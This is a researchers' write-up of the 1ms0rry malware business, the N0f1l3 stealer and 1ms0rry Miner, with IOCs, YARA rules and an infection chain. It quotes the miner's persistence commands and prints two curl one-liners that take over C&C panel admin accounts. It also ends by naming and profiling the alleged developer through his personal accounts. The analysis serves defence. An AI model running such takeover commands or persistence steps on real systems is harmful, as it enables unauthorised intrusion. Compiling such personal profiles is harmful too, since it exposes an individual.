Advertisement
Guest User

Sorry. Not sorry 1ms0rry. Atsamaz Gatsoev malware business

a guest
Apr 9th, 2018
2,599
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 31.30 KB | None | 0 0
  1.  
  2. benkow_
  3.  
  4. dimanche 8 avril 2018
  5. Sorry. Not sorry 1ms0rry. Atsamaz Gatsoev malware business
  6. Hey!
  7. Here we go for another write up, but this time with some friends :D
  8. This is the work of MalwareMustDie feat NibbleHunters!
  9. Greetz to .sS.!, coldshell, fumik0_, siri_urz, VxVault, Cybercrime-Tracker, MalwareMustDie, .sS.! (again) and all the froggy scene.
  10.  
  11.  
  12.  
  13. This post is a quick reminder for the "malware reasearcher" :
  14. Developing malware and selling them is lame and illegal.
  15.  
  16. Introduction
  17. In this blogpost, we will try to present you another malware actor called 1ms0rry. This guy managed to make itself known by selling a password stealer called N0f1l3 in some hack forums, and maybe you recognized him to be the man behind the miner "1ms0rry-Miner", which is pretty active in the wild these months.
  18.  
  19. 1ms0rry was selling builders or/and source code for his malware.
  20.  
  21.  
  22. There is a huge probability that almost all the C&C are controlled by customers and not 1ms0rry himself.
  23.  
  24. This write-up is exclusively about this malware developer, not botmaster(s).
  25.  
  26. Malware Zoo
  27. N0f1l3
  28. The selling ads (RU/Google translate)
  29.  
  30. The malware
  31. The first one is a malware called N0F1L3. Spotted on some forums sold for 20$ the build or 600$ for the source code.
  32. This password stealer was developed for stealing:
  33.  
  34. Browser passwords and cookies (Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex)
  35. Crypto-Currencies wallets (btc, electrum, ltc, eth, bcn, DSH, XMR, ZEC)
  36. Filezilla passwords
  37. Every file on the desktop with the extensions .txt .doc .docx .log
  38.  
  39. This malware is developed in .NET
  40.  
  41. Files artefacts:
  42. %TEMP%\Directory\Browsers\Passwords.txt
  43. %TEMP%\Directory\Browsers\Cookies.txt
  44. %TEMP%\Directory\Browsers\CC.txt
  45. %TEMP%\Directory\Browsers\Autofill.txt
  46. %TEMP%\[HIWD].zip
  47.  
  48. Directories:
  49. %TEMP%\Directory\Files\Desktop
  50. %TEMP%\Directory\Files\Filezilla
  51. %TEMP%\Directory\Wallets\BitcoinCore
  52. %TEMP%\Directory\Wallets\Electrum
  53. %TEMP%\Directory\Wallets\LitecoinCore
  54. %TEMP%\Directory\Wallets\Ethereum
  55. %TEMP%\Directory\Wallets\Bytecoin
  56. %TEMP%\Directory\Wallets\Monero
  57. %TEMP%\Directory\Wallets\DashCore
  58.  
  59.  
  60. Notice that there is no persistence even in the source code published or in the sample in the wild.
  61. In some sample we found this pdb:
  62. C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb
  63. this path is the 1ms0rry's computer we will understand why later.
  64.  
  65. The interesting fact here it seems that this stealer is targeting Russian browser too.
  66. It focus on browsers like Yandex and this one is not really used outside Russia.
  67.  
  68. The C&C
  69. The login page:
  70.  
  71. The collected logs list:
  72.  
  73. Each collected log appears in a separated html file:
  74.  
  75. Minimal settings:
  76.  
  77. And a search engine:
  78.  
  79. The panel is simple but efficient.
  80.  
  81. Vulnerabilities
  82. Since the panel has leaked almost everywhere, and the new versions are patched, let's have a view on the vulnerabilities available.
  83. You can easily change the admin password.
  84. If you look at the first lines of cmd.php (the gate):
  85.  
  86. You just need to send a POST requests with 3 parameters without authentication for changing the password
  87.  
  88. curl -i -X POST -d 'login=admin&password=lulz&change=1' http://n0f1l3cnc.com/cmd.php --header "Referer: http://n0f1l3cnc.com/settings.php"
  89.  
  90. The panel also have some unauthenticated iSQL
  91.  
  92.  
  93. IOCs
  94. PDB related:
  95. C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb
  96. C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb
  97.  
  98. CNCs and associated samples:
  99.  
  100. manganic-rumbles.000webhostapp.com
  101. 40cfb089f9e02a6038177cbec830f387622f5e2b268797682f67a56c303abee
  102.  
  103. tokar222.000webhostapp.com
  104. b1def07459fbc7d417430edf70330e15ad8a775be00d8ccecd25ff240bd00884
  105.  
  106. ih871411.myihor.ru
  107. 2fdf25b8518afd461969fae0dded14500fc6a53dfe231eb8ceb7982a31df604c
  108.  
  109. 9ville.000webhostapp.com
  110. 46483f88191566a4317d79f27f7a289e3503537ee9e1007661864df82ccc8338
  111.  
  112. lmdlm.xyz
  113. 0604de5851a210255b1314430b421573c19c374476260fc96de8924fab332581
  114.  
  115. jwad0w.000webhostapp.com
  116. 28a076ab9282cc2276e84ae3894d64e42af7a9deb26f0b575e526cd01196678b
  117.  
  118. iden1930.000webhostapp.com
  119. Demo panel
  120.  
  121.  
  122. Yara:
  123.  
  124. rule n0f1l3: N0F1L3
  125. {
  126. meta:
  127. description = "N0f1l3 Stealer"
  128. date = "2018-04-06"
  129. author = "coldshell"
  130. reference = https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html
  131.  
  132. strings:
  133. $mz = {4D 5A}
  134. $string1 = "\\Passwords.txt"
  135. $string2 = "\\Cookies.txt"
  136. $string3 = "\\CC.txt"
  137. $string4 = "\\Autofill.txt"
  138. $string5 = "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data"
  139. $mz at 0 and all of them
  140. }
  141.  
  142.  
  143.  
  144.  
  145. N0f1leV2
  146. we found a N0F1l3v2 in the wild
  147. This sample was injected in a malware cryptor named "Paradox Crypter"
  148.  
  149. This cryptor is injected by c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 :
  150. C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb
  151. What's new in the v2? It's now in C++, the stealer also support Firefox for the other part it's just N0f1l3 :)
  152.  
  153.  
  154. 1ms0rry Miner
  155. Here we go for the 2nd malware, this is a Loader + Miner.
  156. The selling ads (RU/Google translate)(click to enlarge):
  157.  
  158. Prices:
  159.  
  160. CPU version - 3000 rubles
  161. GPU version - 3000 rubles
  162. EXTENDED version - 5500 rubles
  163. PRIVATE version - from $ 2000 (discussed individually)
  164. MULTIACC version - 40 000 rubles / month
  165. SOURCE - 200 000 rubles
  166. Bitcoin-purse substitution module - 500 rubles
  167. Module stellera with admin panel - 2500 rubles
  168. Resale of licenses is strictly prohibited (starting from 19.01.2018)
  169.  
  170.  
  171.  
  172. LoaderBot
  173. Loaderbot is developed in .NET and it reuses a lot of code from N0f1l3.
  174. It have basic features.
  175. It kills itself if the task manager or process hacker are launched ("Hides from the task manager, process hacker (absolutely no processes)" feature in the ad).
  176.  
  177.  
  178. The malware installs itself in C:\users\%userprofile%\AppData\Roaming\Windows\
  179. Persistence is done by:
  180.  
  181. Scheduled task: "cmd", "/C "+"schtasks /create /tn \System\\SecurityServiceUpdate /tr %userprofile%\AppData\Roaming\Windows\" + currFilename + " /st 00:00 /du 9999:59 /sc daily /ri 1 /f;
  182. Registry: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  183. A .url file pointing to URL=file://path/to/the/malware
  184.  
  185. Available features:
  186.  
  187. Update
  188. Download
  189. Execute
  190.  
  191.  
  192. Connexion to the C&C is done by GET requests http://cnc.com/cmd.php? :
  193.  
  194. hwid: Used as bot ID (VolumeSerialNumber)
  195. timeout: timeout in case of CNC failure
  196. completed: task ID completed
  197.  
  198. Using the User-Agent "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
  199.  
  200. So, before infecting the victims with a Miner, the attacker install this loader.
  201.  
  202. Miner
  203. The .NET loader drop a miner developed in C++
  204. The first stage install the final miner:
  205.  
  206. copy to %userprofil%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe
  207. launch a scheduled task schtasks /create /tn \\System\\SecurityService /tr %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
  208. Hide the installed files via attrib +s +h
  209. Looks if taskmgr.exe or processhacker.exe are running
  210. Detect if a Wallet address is in the clipboard and if so, replace it
  211. Use RunPE to lauch a fake attrib.exe (final miner). RunPE is done via CreateProcessA(Suspended)/SetThreadContext/WriteProcessMemoryResumeThread/. This code is a copy paste from https://github.com/KernelMode/RunPE-ProcessHollowing
  212.  
  213. The final payload is a C++ miner based on xmrig:
  214.  
  215.  
  216. The C&C
  217. Login page:
  218.  
  219. Workers (hi IPv6 :) ):
  220.  
  221. Tasks:
  222.  
  223. Settings:
  224.  
  225.  
  226. The admin C&C/Market
  227. When 1ms0rry has developped the Miner, he also has developped a backend called SorryCoin.
  228. This panel is used by him and his resellers for building samples and support purpose.
  229. Here you can see 1ms0rry showing sorrycoins and asking for new resellers :
  230.  
  231. Panel Instructions:
  232.  
  233. Информация о панели
  234.  
  235. Личная статистика
  236. Личная статистика пользователя создана для удобства слежения за своими достижениями и прогрессом.
  237. В ней будут отображено: общее кол-во сделанных билдов, кол-во продаж, кол-во рекриптов/чисток/выданных обновлений,
  238. ваша должность, дата регистрации, кол-во заработанных денег, кол-во покупателей в черном списке и ваши SorryCoins
  239.  
  240. SorryCoins служат для определения вашего КПД в команде. За каждую чистку/рекрипт/обновление/продажу вам начисляется
  241. определенное кол-во монет. Каждый месяц каждый участник команды будет получать от меня премию, равную кол-ву
  242. его монет.
  243.  
  244. Билды
  245. Основная страница. Служит для создания билдов майнера и бота. Необходимо заполнить поля: Пул, кошелек от пула
  246. (к примеру майнергейта - www@mail.ru), пароль от пула (обычно x), логгер (ссылка для сбора айпи, если не нужен,
  247. можно указать что угодно если поле не нужно), ссылка на админ-панель (на cmd.php файл,можно указать что угодно
  248. если поле не нужно), биткоин кошелек подмены (для стиллера биткоинов, можно указать что угодно если поле не нужно),
  249. цена (полная сумма,которую оплатил клиент), примечание (можно написать что угодно если поле не нужно),
  250. тип билда и версию, которую приобрел покупатель После создания заявки вам необходимо подождать пока статус вашего
  251. билда не изменится с queue (очередь) на done (сделано). Далее перейти по ссылкам, скачать файлы и передать клиенту
  252. Расценки
  253. Во вкладце "Расценки" опубликованы официальные цены на продукты и информация о вашем доходе с продажи каждого.
  254. Они могут изменяться, так что проверяйте раз в день.
  255. Общая статистика
  256. В общей статистике будет отображен прогресс всей команды. Это: общее кол-во билдов, продаж,
  257. рекриптов/чисток/обновлений, участников команды, заработанных денег, покупателей в черном списке
  258. Материалы
  259. В этой вкладке опубликованы самые последние материалы для майнера, информация о версиях майнера, бота и стаба.
  260. Черный список
  261. Раздел создан для удобства общения с клиентами (сарказм). Если вы кому-то отказываете в поддержке, необходимо
  262. внести данного клиента в базу и написать его контакты, никнейм и причину отказа.
  263. Лог посещений
  264. Страница, доступная только админу. Отображает логи посещений пользователей. Позволяет выявлять шэринг аккаунта.
  265. Пользователи
  266. База пользователей (команды) в которой можно отследить прогресс других участников
  267. TODO
  268. Список того, что нужно сделать. Удобно, если вам нужно что-то записать. Для каждого индивидуальная записная
  269. книжка - никто другой не сможет ее посмотреть.
  270.  
  271. Google translate:
  272.  
  273. Panel Information
  274. Personal stats
  275. The personal statistics of the user is created for convenience of tracking of the achievements and progress.
  276. It will display: the total number of builds made, the number of sales, the number of recs / purges / issued updates,
  277. your position, the date of registration, the number of earned money, the number of buyers in the black list and your SorryCoins
  278. SorryCoins serve to determine your efficiency in the team. For each cleaning / precription / update / sale you are credited
  279. with a certain number of coins.
  280. Each month each member of the team will receive from me a bonus equal to the number of his coins.
  281. Builds
  282. Main page. Serves to create a Miner and Bot build. You need to fill in the fields: Poole, purse from the pool
  283. (for example, minergate - www@mail.ru),password from the pool (usually x), logger (link for collecting ip,
  284. if you do not need it, you can specify anything if the field is not needed)
  285. link to the admin panel (on the cmd.php file, you can specify anything if the field is not needed),
  286. bitcoin substitution wallet (for the bitcoin styler, you can specify anything if the field is not needed),
  287. the price (the total amount paid by the client) note (you can write anything if the field is not needed),
  288. the build type and the version purchased by the buyer
  289. After creating the application, you need to wait until the status of your build changes from the queue on done.
  290. Next go to the links, download the files and send to the client
  291. Pricing
  292. In the "Prices" tab you can find official prices for products and information about your income from the sale of each.
  293. They can change, so check it once a day.
  294. general Statistics
  295. The overall statistics will show the progress of the whole team. This: the total number of builds,
  296. sales, recs / purges / updates, team members, earned money, buyers in the blacklist
  297. Materials
  298. In this tab the most recent materials for the miner, information about the versions of the miner, bot and stub are published.
  299. Black list
  300. The section is created for convenience of dialogue with clients (sarcasm). If you deny support to someone,
  301. you need to enter this customer into the database and write his contacts, nickname and the reason for the refusal.
  302. Log of visits
  303. Page, accessible only to the administrator. Displays the logs of user visits. Allows you to identify account sharing.
  304. Members List
  305. Database of users (teams) in which you can track the progress of other participants
  306. TODO
  307. A list of what needs to be done. Convenient if you need to write something down.
  308. For each individual notebook - no one else will be able to see it.
  309.  
  310. Panels Overview:
  311.  
  312.  
  313.  
  314.  
  315.  
  316.  
  317.  
  318.  
  319. Vulnerabilities
  320. As usual, code reuse = vuln reuse. The admin account takeover is still her:.
  321. curl -i -X POST -d 'login=admin&password=mypass¬e=&type=admin&useradd=1' http://S0rryCoinCnC/cmd.php --header "Referer: http://S0rryCoinCnC/users.php"
  322.  
  323. IOCs
  324. PDB related:
  325. C:\Users\gorno\Documents\Visual Studio 2015\Projects\GPULoader\GPULoader\obj\Release\GPULoader.pdb
  326. c:\Users\User\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
  327. c:\inetpub\wwwroot\Bot\Miner\obj\Release\LoaderBot.pdb
  328. C:\Users\gorno\Desktop\RelWithDebInfo\xmrig.pdb
  329. C:\Users\gorno\Desktop\[NEW] builder\Miner\Release\winhost.pdb
  330. c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
  331.  
  332. CNCs and associated samples:
  333.  
  334. ih753479.myihor.ru
  335. b25c3eda59e0014df05c9aa4451ab09c2153ddb919e105a693f1f8923e465157
  336.  
  337. ih894017.myihor.ru
  338. e61d08bea42a6d2d49819e81e18b76db4413a1d80abeac8d8f8a75f18b940b24
  339.  
  340. ih895435.myihor.ru
  341. 867e605f0dc7d8e5aa62a9db99ebc8f12b1c09713707298c3c70e0294d14ebb7
  342.  
  343. ih903818.myihor.ru
  344. a8c7f6dbc844a2b8b10e1751f65453b20392fa82caa9e83fcce3c496b3021fba
  345.  
  346. sawerticq.myihor.ru
  347. 45cec8803dd773469012d80afd3abf3eaf9a8f8b938a03ce8e52c2cba6dd28d2
  348.  
  349. pokerhot.ru
  350. 22fdc1c82acda24c3684f0cdc53128e6f24c32c564e0e8f0488d4d0f55ee7f2c
  351. f448e4d1d52f46ab79ddf77f93fb28324439c2441c399d4224a570d87c1b556d
  352. f3d8e6abc1b725b5bf73cf8ed39b517f00fd46e65dfa23432ec7119d4d3b4d64
  353. d8287fd95435c00ef70c162a9bfd9b359e43d3b75cb764d5ec5b1d545b3f2133
  354. 0c0d58b488dafcfb632a7e020ceef22f95e68f9e6c55036f0a2f0b816da40bd1
  355. 95f89b82eda0548b93a0d62fb73446d32bdaa83d9d6ae4906a927d3e903e99e7
  356. 45551ae1c8cb97fe51b826f3f740ebcfd8ef061f14bcf458eeb2176b2d826050
  357. aa9f2b763d3eebf6060e6b41c56520b2fd66fca87789dd6528703dcd33b67567
  358. 17ead882b04f22054b6ee06bf04e7b64eb7289a5c7f01f9faff397dad50287c6
  359.  
  360. ivanvarb.beget.tech
  361. 6de67141c7602544ca75cab06d840716d8eec9474bd744b39aa0f071b44ad16f
  362. 2e57dc399aeb974b12e299a042ae051ab09c039794dfc495b99e76f8a5aeb4bc
  363. 830bc74e10ac5a9baf6461081eed5496dc293145d184a10c60303b5f289835b6
  364. 8460ae8685964f1922dc1cbe1e19f6714d41b801487da647a6c6bea3ded3ac2c
  365. 600d00bb9b94b1164670c3e210271ba1623b9f44da681f66a8235e6c8e553470
  366. 3c44f07a1930bdcceae1bd01138a71fc2c9bf87138dc324477dbe39b9ae01bc0
  367. a358e56c91218b5f21d54556fb7aef5de158da4764c9cf8e5d71e3e41ff4841f
  368. 49cb77361d08c86faf572829baa1ba06a7581254ddc45f074d67f72852c64152
  369. 195b79a3ee7275081aa538ba2e619864d9504c5bce6744334cfca5c5990fd1d2
  370. 26188b4be138b3bb3bef2d3a0eb98fbba83020f09bde0b2da4ee92f2c887df9c
  371. 5d286edf2f49dc61a3f70e6c25e13d92ae36f284b9b27440cc8f5bcd0084662e
  372. 2d98bd04d906c6600b6c2a1cf4ef2f60a2af1656b1a6f8b01913bd6d157a87b4
  373. 4d646cfc9cc82420a8d4028989322fb006eba07400ee4705f91fe1604cbe1513
  374. b3648a2dbed0e1833b3278729c210144145696fd908aad3a4e991ef566d6d903
  375. 4c25f0f6a78b5bf7cb047446a458154cbbdf522c2bdea3daf2682eed168c7814
  376.  
  377. krasotka-kuphino.ru
  378. 2b099e9ab15b5056b0e4b09ea5751ecb76ebce1b02251c4a23fc133ea04918ee
  379. 81660ecc8467a284b689afdc3b60b5faa73b2a8385c57000e6c19f05944cf714
  380. e5ecf75fe7991a351e52d64d14e6fb96c9d6eec7f5a0ccc64ea67753be03714a
  381. 6fa7da5f3026074b6c2a4b98865175f024941057a8c55d5516797f928a737195
  382.  
  383. panel.enable.pw
  384. aa5037e15d6c2ea27fff9726cc3951660490273726edc9510a5e78d0afb82e68
  385.  
  386. t3h1337.se
  387. 76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28
  388. d50a5373add2eb3e94a7b341781a3b09521e5c13387ace7f73995fe810c287ff
  389. f31a16510da94c57ca0864562186a69540c5f2024f15d6d2eabd21f2a847fabc
  390. 66370e465351ce5da550f34afd0e03ff91fb906f077412a4c3f3c40a74c67e21
  391. b037861cb7b32607f917146c2dc8e67109b9389ff1e2808c10681e7a953dd85c
  392. 0e346d3f905acff6aa5fe1479b7ce9a5957312838061620f624749d8ddb1e180
  393. cbbce47b73a43b76c501717cd99243e2cbc226184e9828ca7887ac7d38fe5099
  394. f11e1379b1d1f74d6ef738841eba0b7c125c8717f6411ce5cf12e695caf028c4
  395. e3f5668ed13b860d5b90e3c9e99015ecef8985343ab4057c83fce3f8bc119bc8
  396. 4f443a5c0189878a20e9fe59642bc68c4d78c7ee4cd6a1f1e35fff25600fafb4
  397. 974a28dd21a0a25393180e9abf656d4e2583422c5d1102aeca7d839de29f10ac
  398.  
  399. cq95452.tmweb.ru
  400. f80742032ff611f7e569f4f9b1d879377f81a3ae2a85e0234c161de5122058b0
  401. 2cfa2019f3002c7ea1f9cb1555caa5b84554f68e1cd54a436c9aa67a9359286f
  402.  
  403. uomomo.tmweb.ru
  404. eb7d44264bc83c2f77958342aede1d2d266ee53380295ce9fd3e3630780031c9
  405.  
  406. 67864.prohoster.biz
  407. cd2874a83ca324eebbeaa134330d667aee72d28ded20bd44d4d48c91ce6474b1
  408.  
  409. 109.234.36.233
  410. a80038832522f8a4a0d5bfba7755ac73d506a0c523e8f86a4d7ae2dc798c0937
  411. c577a5ddbdf85ab2a168223d80981cf1d835f15dbf0437cc43b5801cc37010a6
  412. 61d75bf9a006dcfea78e0c792cc4db7b0de82cd847d30680be08c463eaaf643f
  413.  
  414. sorry.enable.pw
  415. 2d6e94a539f89b3dfc3c8ced8ca7facf3840a3706fa6079a9328234133936143
  416.  
  417. zlives.ru
  418. b0220a121e1daf7fc21f1869ceb4a588a1935ff4a7dbcc8660e8c661f40c26bb
  419. 66ce33495863914fee2bc0355d6911b0912150cbad0846721d9cf769858029b5
  420. 5da4dbdd3d67abcd38df00aabc4f9a9393751e89c98a08d9ce946c47d1672eff
  421. aa4fd3dc52be981c482d955287c2c13f0b2535e5d351516a49f9150c62a92714
  422. f15a876dcf2b9f226d4b61b847e3d15923cb04d7883a9aef757af3ed3d62f2b6
  423. 36e0a614810635c9c3d9091d91f476e1cce822ff6aba34e2f9ecb818faa018cb
  424. 3c14574aafdef0e216a289aff47704eb5d1071081594b2740f08a6fe6551dbfe
  425. 49755ff17be7bf0510fde970c2a6dd9d033b2b92322ae44b47276c28f7fdc78e
  426. 473cc575686c060c86aa5b78128832bdbbe4ce3352ce60a7e9c06dd36383b1b7
  427. 7f3e3ff028f521a50f1f8abd6549d092f198836993553e36e05981fe723daae3
  428. ac865ff6cddbd825d459342dc1bbb91bee32cff945e4d717ad956d497acb213a
  429. acf14c531bb5fc391a7a72ddd0e3ce9ea04939b8e6068f3667dc49896ffe90f4
  430. 81d51d7659dee946512cae617ea5215e2ca0945200d397052c1d4d137e810481
  431. 873bf7726cada94352ae15e5a7520187dfbf33b450131ba41148452f94adfaf9
  432. 58447db309ca8ec0090194d03f5fddda89b33ecce60306ea567e394c956caf23
  433. d394e0115fb48be2492cd66f41def6070a0f171149177ad1fb5813d4a531d872
  434.  
  435. letstrytomoney.000webhostapp.com
  436. 79ad0aec7a30a8c3085256a6b36fafdc5448a6392ae79621356e6de6cede90ae
  437. 6ab8bbf76641e1f04252f7a8a579b2c7a493cd67452222a08260d3ef827113ff
  438. 1f3d0bf4afc4b31c0e1dac027636c0996cc99e474d6b85d68fd7e27c919d34e6
  439.  
  440. plaza777.co.ua
  441. 50587f56bc5cda5c9c49bfe233cea4a6da70207d34506865d215f6f84d75af17
  442.  
  443. v90327ux.beget.tech
  444. efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8
  445.  
  446. moneyrob.info
  447. b6674acc2314913ad8c8ed14ce50c12b0f6babff3081969d7e2a1ab05f53af96
  448.  
  449. ce24411.tmweb.ru
  450. c443c08c3071d3842b9cc26bbb34125e0baf894600f56b2aaab4519f488a31f3
  451. 294300b8ec1c41d0a0c71283d02bb359f6c9e38db2d630e1ec6087abf763730f
  452. 4da1b7cd2e6b5e53f4395eceb2d9180dec678e3c28cdff5ca54bb8526cef4bd8
  453. 56f9709e665738fd81d0880c4eecc45e678784880cdb83e9808bbff606d41cc9
  454. a9bdf007c8a31e2034171fdfb20d07a51341e3e4977ef118a9764597d728a0b6
  455. 711ec24f2a2d1daff050a10fa3c3f2bf6b86a3ce02e785fe2327836ff2c4c9f1
  456.  
  457. 68054.prohoster.biz
  458. fefedc45386b83926aaa6893121bed424be0e0278319a5d97ee0cb74c7133144
  459.  
  460. 5.200.55.248
  461. karlikvm.beget.tech
  462.  
  463. 61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992
  464.  
  465. Yara:
  466.  
  467. rule 1ms0rryMiner: 1ms0rryMiner
  468. {
  469. meta:
  470. description = "1ms0rry Miner"
  471. date = "2018-04-06"
  472. author = "benkow_"
  473. reference = https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html
  474.  
  475.  
  476. strings:
  477. $mz = {4D 5A}
  478. $string1 = "?hwid="
  479. $string2 = "&completed="
  480. $string3 = "?timeout=1"
  481. $string4 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
  482. $string5 = "LoaderBot.Properties.Resources"
  483.  
  484. $mz at 0 and all of them
  485. }
  486.  
  487.  
  488.  
  489. Misc
  490.  
  491. TImeline: (click to enlarge)
  492.  
  493.  
  494. Attack vectors
  495. Some campaigns using 1ms0rry malware:
  496. Fake fonts: https://www.malware-traffic-analysis.net/2017/11/27/index.html or https://www.malware-traffic-analysis.net/2017/11/12/index.html
  497. Fake Flash installer : https://www.malware-traffic-analysis.net/2018/01/02/index2.html
  498. >https://www.hybrid-analysis.com/sample/e6aeef24c04a1d327e9b8337ca50c74f686ca041ac161a130ca31003ceaaaa7e?environmentId=100 : This sample is really interesting.
  499. The infection chain is :
  500.  
  501. github.com/vaio666999/2/blob/master/GoogleUpdater.exe << LoaderBot :: sorry.enable.pw/cmd.php?hwid=24C2B6A0
  502. github.com/vaio666999/2/raw/master/GoogleUpdate.exe << Rarog :: api.enable.pw/2.0/method/checkConnection
  503. github.com/vaio666999/2/raw/master/xmrig32.exe User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
  504. xmrig32.exe -o xmr.pool.minergate.com:45560 -u stasmiomi@gmail.com -p x -k -t 1
  505.  
  506. 61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992 is Rarog
  507. Backdoored software:
  508. efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8 - RDP Bruter
  509. 76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28 - WinDjView setup
  510. c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 - Paradox Crypter
  511.  
  512.  
  513. Competitive analysis
  514. This actor is really active on his GitHub. Thanks to him, this is a gold mine to have some information about what is going on seller forums. He decompiled a bunch of malware and analyzed them on telegra.ph and pushed all sources on his repository. This is a good way for him to check if there is no copycat for his miner. For example, when he analyzed a miner developed by EvilBanana. He mentioned that is a bad copy of "his" miner explicitly :
  515.  
  516.  
  517. the highlight sentence means "this miner turned out to be my miner of the first version, but it's a little broken for some reason"
  518.  
  519. He reviewed some diversity of malware/tools (miners, botnet, loaders...) and tried to explain if features were really well developed and effective, or it's just basic crappy stuff..
  520.  
  521. Reviews are available there :
  522. http://telegra.ph/Analiz-skrytogo-majnera-ot-Dzotra-12-31
  523. http://telegra.ph/Analiz-botneta-DarkSky-12-30
  524. http://telegra.ph/Analiz-skrytogo-majnera-ot-Hostis666-12-20
  525. http://telegra.ph/Analiz-skrytogo-majnera-ot-GucciMine-12-05
  526. http://telegra.ph/Pishem-kejlogger-na-C-12-07
  527. http://telegra.ph/Analiz-skrytogo-majnera-ot-Proga-12-10
  528. http://telegra.ph/Analiz-skrytogo-majnera-ot-Eduard1337Vans-12-10
  529. http://telegra.ph/Pishem-nerezidentnyj-RunPE-loader-na-C-12-12
  530. http://telegra.ph/Analiz-skrytogo-majnera-ot-EvilBanana-ims0rry-12-25
  531. http://telegra.ph/Pishem-miniatyurnyj-HTTP-flooder-na-Python-3-12-28
  532. http://telegra.ph/Analiz-skrytogo-majnera-ot-Hawksh-01-01
  533. http://telegra.ph/Pishem-DDOS-bota-na-C-CHast-1-02-04
  534. http://telegra.ph/Analiz-stillera-ot-xZist-01-06
  535. http://telegra.ph/Pishem-loader-s-avtoudaleniem-na-C-01-09
  536. http://telegra.ph/Analiz-majnera-ot-EgorSa1dy-02-22
  537.  
  538.  
  539. Forks
  540. Some Fork example:
  541. FelixHTTP (N0f1l3 fork):
  542. Ref:
  543. https://twitter.com/siri_urz/status/974205197407932416
  544. 40089ea9af2c1191fd9dfec5c49d1c37809b9eae8609bcaa810346e81ca3384a
  545. freexmr.ru
  546.  
  547.  
  548.  
  549.  
  550. BUMBLEBEE MinerPanel:
  551. Ref:
  552. https://twitter.com/malwrhunterteam/status/956155159469608960
  553. ih803741.myihor.ru
  554.  
  555.  
  556.  
  557.  
  558.  
  559. EnlightenedHTTP
  560. Ref:
  561. https://twitter.com/ViriBack/status/962051515526520832
  562. 179.43.147.227/mine/
  563. v90327ux.beget.tech
  564. 1754d64016c758a65cb85df328ffd502a7255a6855d976e3bdeb497f95201848
  565.  
  566. Evrial
  567. Evrial (https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/) use code from 1ms0rry for sure:
  568.  
  569. Who is 1MS0RRY ?
  570. Now let's try to understand who is 1ms0rry.
  571. We know that he as :
  572.  
  573. a Twitter account: https://twitter.com/ims0rry_off
  574. a Telegram account: https://t.me/ims0rryblog
  575. a Github account: https://github.com/ims0rry/
  576.  
  577. Let's try to get the nickname and the email used to commit in the Github account.
  578.  
  579. This command gives us (full details in the annex section):
  580.  
  581. gornostay322@mail.ru
  582. lordatsa@mail.ru
  583. your_email@whatever.com
  584.  
  585. with the nicknames:
  586.  
  587. Gatsoev
  588. hype
  589. ims0rry
  590. s0rry
  591. Your Name
  592.  
  593. lordatsa@mail.ru give us a mail.ru account https://my.mail.ru/mail/lordatsa/photo
  594.  
  595. We now have a name Аца Гацоев (Atsa Gatsoev)
  596. All these information help us to find this Weblancer profile: https://www.weblancer.net/users/hypega/
  597.  
  598. This profile is interesting because:
  599.  
  600. the name Ацамаз Гацоев (Atsamaz Gatsoev) is the same as the mail.ru account
  601. The username used is hypega. hype was used to commit on github, hypega for "hypeGatsoev
  602. The personal website in the profils information is http://lordatsa.wix.com/gatsoevsummary lordatsa is used as username for mail.ru
  603.  
  604. http://lordatsa.wix.com/gatsoevsummary is also interesting:
  605.  
  606. VK Account: https://vk.com/quiet_and_invisible
  607. G+ account: https://plus.google.com/u/0/109976643017066209762/posts/p/pub
  608.  
  609. the VK account looks down but the photos in the G+ account points to 1ms0rry again:
  610.  
  611. The G+ account allows us to switch to the related Youtube account:
  612.  
  613. Now, take a deeper look at this video https://youtu.be/zPRo3hkVbrQ?t=4
  614.  
  615. This directory [NEW] builder on the desktop reminds us LoaderBot pdb :
  616. c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
  617.  
  618. In https://youtu.be/KUvLk20-NZk?t=6 at 6sec we can see Thermida and a local path C:\Users\gorno
  619.  
  620. In https://www.youtube.com/watch?v=KUvLk20-NZk at 1 sec we can see the viruscheckmate user wich is hypega (again)
  621. His freelancer account is interesting too, https://freelance.ru/hypega.
  622. it allows us to retrieve 2 links:
  623. * A Portfolio website: lordatsa.wix.com/e-consultant (via https://freelance.ru/hypega/elektronny-konsultant-2810410.html)
  624. * A GitHub account: github.com/Gatsoev/Nerve_MobileApp (via https://freelance.ru/hypega/pr-agent-2966193.html)
  625. This Github account is a perfect proof.
